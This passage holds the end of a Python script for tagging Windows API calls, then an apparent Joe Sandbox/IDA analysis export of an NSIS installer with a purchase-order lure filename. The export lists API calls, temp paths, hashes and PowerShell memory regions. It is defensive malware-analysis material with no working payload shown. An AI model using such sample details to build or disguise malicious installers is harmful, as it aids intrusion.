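    base = api[:-1] if len(api) > 1 and api[-1] in "AW" and api[-2].islower() else api
    for tag, names in TAGS.items():
        if base in names:
            return tag
    return "other"


def summarize(rec: FunctionRecord, include_subcalls: bool = False) -> Counter:
    """Count triage tags; subcall lines belong to another function and are skipped by default."""
    return Counter(tag_for(c.api) for c in rec.calls if include_subcalls or c.subcall_of is None)


def span(rec: FunctionRecord):
    """Lowest and highest direct call-site address, to locate the function in the dump."""
    refs = [c.ref for c in rec.calls if c.subcall_of is None]
    return (min(refs), max(refs)) if refs else None


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        lo, hi = span(rec)
        print(f"function around {lo:08X}-{hi:08X}: {dict(summarize(rec))}")
        for c in rec.calls:
            where = f" (via {c.subcall_of:08X})" if c.subcall_of else ""
            print(f"  {c.ref:08X} {c.api}.{c.module}{where} {len(c.args)} args")
```

Running the module on the full text export of a report gives one summary line per function, which makes the file-writing and registry-touching functions of an installer stub like this one stand out from the GUI plumbing; subcall lines are excluded from the summary because the report lists them under the caller as well as under their own function, so counting them twice would skew the picture.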
                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                • MulDiv.KERNEL32(000D5D38,00000064,000D5F3C), ref: 00402FDC
                • wsprintfW.USER32 ref: 00402FEC
                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: 8]$<_$verifying installer: %d%%
                • API String ID: 1451636040-2917703732
                • Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                • Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
                • Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
                • Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58
                APIs
                • GetWindowLongW.USER32(?,000000EB), ref: 004044FA
                • GetSysColor.USER32(00000000), ref: 00404538
                • SetTextColor.GDI32(?,00000000), ref: 00404544
                • SetBkMode.GDI32(?,?), ref: 00404550
                • GetSysColor.USER32(?), ref: 00404563
                • SetBkColor.GDI32(?,?), ref: 00404573
                • DeleteObject.GDI32(?), ref: 0040458D
                • CreateBrushIndirect.GDI32(?), ref: 00404597
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                • Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54
                APIs
                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
                • CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
                • CharNextW.USER32(?,00000000,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
                • CharPrevW.USER32(?,?,76A13420,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-2977677972
                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                • Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD
                APIs
                  • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                  • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                  • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 3248276644-1123221927
                • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                APIs
                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,C:\Users\user\AppData\Local\Temp\nstDD9E.tmp,?,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                • CharNextW.USER32(00000000), ref: 00405EA7
                • CharNextW.USER32(00000000), ref: 00405EBF
                Strings
                • C:\Users\user\AppData\Local\Temp\nstDD9E.tmp, xrefs: 00405E95
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharNext
                • String ID: C:\Users\user\AppData\Local\Temp\nstDD9E.tmp
                • API String ID: 3213498283-2038086183
                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-3355392842
                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                APIs
                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001), ref: 0040302C
                • GetTickCount.KERNEL32 ref: 0040304A
                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                • ShowWindow.USER32(00000000,00000005), ref: 00403075
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Window$CountCreateDestroyDialogParamShowTick
                • String ID:
                • API String ID: 2102729457-0
                • Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                • Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
                • Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
                • Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D
                APIs
                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,00000000,?,?,?,?,: Completed,?,?,0040664F,80000002), ref: 0040642E
                • RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed,?), ref: 00406439
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CloseQueryValue
                • String ID: : Completed
                • API String ID: 3356406503-2954849223
                • Opcode ID: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                • Instruction ID: 998e79ef7726f2f5777b90a8cc8b3066c283ada07cb0ab9722e08f3c700fe3cb
                • Opcode Fuzzy Hash: c8e7ab71330f2791f483a460aa46ee3ca29019eaf6ff50790d5d7e2e81223b20
                • Instruction Fuzzy Hash: D1017C72500209AEDF219F51CC09EDB3BB9EB54364F11803AFD1AA2191D738D968DBA8
                APIs
                • FreeLibrary.KERNEL32(?,76A13420,00000000,C:\Users\user\AppData\Local\Temp\,00403B0C,00403A3B,?), ref: 00403B4E
                • GlobalFree.KERNEL32(00000000), ref: 00403B55
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B34
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: Free$GlobalLibrary
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 1100898210-3355392842
                • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                • Instruction ID: 695255c2ecde24bf448a41ac97d2e3a141eb08f66f7233a7170c0cf0b0d44fd9
                • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                • Instruction Fuzzy Hash: A0E0123390112057C6215F55FE04B5AB77D6F45B26F05403BE980BB2618B786C428BDC
                APIs
                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 00405E3B
                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,80000000,00000003), ref: 00405E4B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-3370423016
                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction ID: cbb238d5cba983021c059698dd1e30487a08ad5c01a1b7d12c600bff718c79a2
                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                • Instruction Fuzzy Hash: 0ED05EB2410A209AC3126708EC04A9F63ACEF5570074A4427E581A61A4E7785E818AE8
                APIs
                • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405F7F
                • lstrcmpiA.KERNEL32(?,?), ref: 00405F97
                • CharNextA.USER32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FA8
                • lstrlenA.KERNEL32(?,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB1
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction ID: d1bddae3a0f18f97ac1aa465d67762edc6f3aabfb23b395e61e0e19fb30ac715
                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                • Instruction Fuzzy Hash: 50F0C231205414FFD7029FA5DE049AFBBA8EF06250B2140BAE840F7310DA78DE019BA8
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 58856cd595d4cb148310908430179fc9e7d1d408c9ac2a57ebe1029af5bab530
                • Instruction ID: 54aaa5e283bbd584e165237d0673d43cb3bcc7178e297813a4e991403c6486ca
                • Opcode Fuzzy Hash: 58856cd595d4cb148310908430179fc9e7d1d408c9ac2a57ebe1029af5bab530
                • Instruction Fuzzy Hash: F2034DB4A00719DFE724DB64CC90BAAB7F2BF85305F1084A9D9196B385CB71AD81CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b1f54b12a3e85dd89a8a39c07c8ed383e2c41efbd8112a9db16b7d1d77644068
                • Instruction ID: c9d01d89e6840468287f4f6496d3d52a612aa1ff4fed9aaf55b7f8c07336e259
                • Opcode Fuzzy Hash: b1f54b12a3e85dd89a8a39c07c8ed383e2c41efbd8112a9db16b7d1d77644068
                • Instruction Fuzzy Hash: 70B15B70E10249DFDB10CFA9DC8579EBBF2AF88714F18812DD819AB254EB749D45CB81
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 28f20561c2840d21e061415b907e1ca39c88d875ad7f6a64423edb14d6c797b2
                • Instruction ID: 5250278ccc9d4fbc23cf8feafcaa5319355eb4bdfbadefa81f076f6b97c61d95
                • Opcode Fuzzy Hash: 28f20561c2840d21e061415b907e1ca39c88d875ad7f6a64423edb14d6c797b2
                • Instruction Fuzzy Hash: A4B16C70E102498FDB10CFA9D8C179EFBF2AF88754F18812DD815AB254EB749D85CB81
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f98e7c690e0b9614ac32713188d22e8548db1312cbb3c06e9c3ba39d9b7d2a8e
                • Instruction ID: cc0782341b1a17e831889e3ee522b0af5adc7a6a3e631b5e8d50917a7d052e33
                • Opcode Fuzzy Hash: f98e7c690e0b9614ac32713188d22e8548db1312cbb3c06e9c3ba39d9b7d2a8e
                • Instruction Fuzzy Hash: BEC281B4A01715DFE724DB60CC90BAAB7F6EF89305F1084A9D8196B385CB71AD81CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 089785ecb61fd6786fcc4dd9ee85010ee0920dff8e1b4b9ff7391cc855e55687
                • Instruction ID: ace32d0c2d50bbf4e5dbe6d8bfcbdcaa967b23f6fdf7cf6d6f389261df12ad7c
                • Opcode Fuzzy Hash: 089785ecb61fd6786fcc4dd9ee85010ee0920dff8e1b4b9ff7391cc855e55687
                • Instruction Fuzzy Hash: FEA2C3B4A00355DFEB24DB64CC50BAEB7F2AF85305F11C4A9D51A6B385CB71AC81CBA1
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3c65709f89a873b90b686d1f3527007e077fa130bb09515d38157c4d9e45e7a
                • Instruction ID: bb60c8a912b5c6d06025e196dd2d7183f363b0a11517455b29d671318b185d3f
                • Opcode Fuzzy Hash: c3c65709f89a873b90b686d1f3527007e077fa130bb09515d38157c4d9e45e7a
                • Instruction Fuzzy Hash: BFA281B0F10315DFE728CBA4C454B6977B2AB85305F258168D815AF392CBB1EC92CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 422a7bdb6ad7b147db291548e453b009abae30e92d2746cdab0cebd448233185
                • Instruction ID: 4524a32d517a33c6e6bdd2e1d673fd8dbb42d73aac32f03c6218a266cc13ddf2
                • Opcode Fuzzy Hash: 422a7bdb6ad7b147db291548e453b009abae30e92d2746cdab0cebd448233185
                • Instruction Fuzzy Hash: CD8280B0E00315DFE728CB64C844FA977B2EB89315F258159D914AB392C7B2EC96CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 494ba84a94b05c52bb91c01bd15e7107fd208a04e925ce1de686263531956ee7
                • Instruction ID: c26d078203470f5ac05844b724d331b69e2dbb87e225ba4f3747b909a05b35d7
                • Opcode Fuzzy Hash: 494ba84a94b05c52bb91c01bd15e7107fd208a04e925ce1de686263531956ee7
                • Instruction Fuzzy Hash: 98828274A00355DFE724DB60CC50BAEB7B2AF89305F10C9A9D55A6B345CB71AC82CFA1
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4abc0de561c591f9d5c501eea83563cbe9556bf87c7c6a6d57dafe8bcee1c9a
                • Instruction ID: 15682fbecc1c7e3c1c09cc2271b2b5967d458f3994064f5655c87b5c3dcbd951
                • Opcode Fuzzy Hash: b4abc0de561c591f9d5c501eea83563cbe9556bf87c7c6a6d57dafe8bcee1c9a
                • Instruction Fuzzy Hash: 5C827EB0E10315DFE728CB64C844BA977B2EB84709F258158D915AF392C7B2EC96CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76792302382.0000000008FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FD0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_8fd0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e341073d486426d2fb79a9314e22bb942075c9f9a119fc8411440981656694e1
                • Instruction ID: c1e584e34491d30eac6d466e9084349985fec85490813abb83ea26b9fc5a3125
                • Opcode Fuzzy Hash: e341073d486426d2fb79a9314e22bb942075c9f9a119fc8411440981656694e1
                • Instruction Fuzzy Hash: 4032BE75A04305DFDB24CBB5C454BAABBA2AFC9212F18C06ADA059B255CF71DC42CBA1
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
